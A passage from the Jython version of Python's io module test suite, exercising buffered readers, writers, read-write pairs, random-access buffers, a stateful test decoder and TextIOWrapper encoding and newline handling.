# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
@support.cpython_only
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so checking
# this is not so easy.
# Jython note: not raised by the _jyio.py stand-in; maybe in an eventual Java version.
# CPython raises "raw readinto() returned invalid length" here:
# http://hg.python.org/cpython/file/8527427914a2/Modules/_io/bufferedio.c#l1298
self.assertRaises(IOError, bufio.read, 10)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends up in gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
@unittest.skipIf(support.is_jython, "FIXME: in the Java version with ArgParser")
# When implemented in Python, the error message is about __init__, even on CPython
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise IOError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
@unittest.skipIf(support.is_jython, "FIXME: in the Java version with ArgParser")
# When implemented in Python, the error message is about __init__, even on CPython
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
@unittest.skipIf(support.is_jython, "FIXME: in the Java version with ArgParser")
# When implemented in Python, the error message is about __init__, even on CPython
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are period-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
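# Worked example of the state packing above: after reset() both I and O are
# 1, so i ^ 1 == o ^ 1 == 0 and the integer part of the state is
# 0*100 + 0 == 0 (hence the "flags = 0 after reset()" comment in getstate()).
# With, say, I=2 and O=6 the state integer is 3*100 + 7 == 307, and
# setstate() recovers (2, 6) via divmod(307, 100) followed by the same ^ 1.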
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
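# A minimal usage sketch of the decoder defined above; it is not part of the
# test suite and is never called by it. It assumes the same Python 2 / Jython
# interpreter as the rest of this module; the expected strings are consistent
# with the docstring and with StatefulIncrementalDecoderTest.test_cases below.
def _demo_stateful_decoder():
    d = StatefulIncrementalDecoder()
    # Defaults I=1, O=1: every input byte becomes "<byte>." on output.
    assert d.decode(b'abcd', final=True) == 'a.b.c.d.'
    d.reset()
    # 'i.' switches to variable-length (period-terminated) words, 'o6.' pads
    # or truncates each output word to 6 characters.
    assert d.decode(b'i.o6.x.xyz.', final=True) == 'x-----.xyz---.'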
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
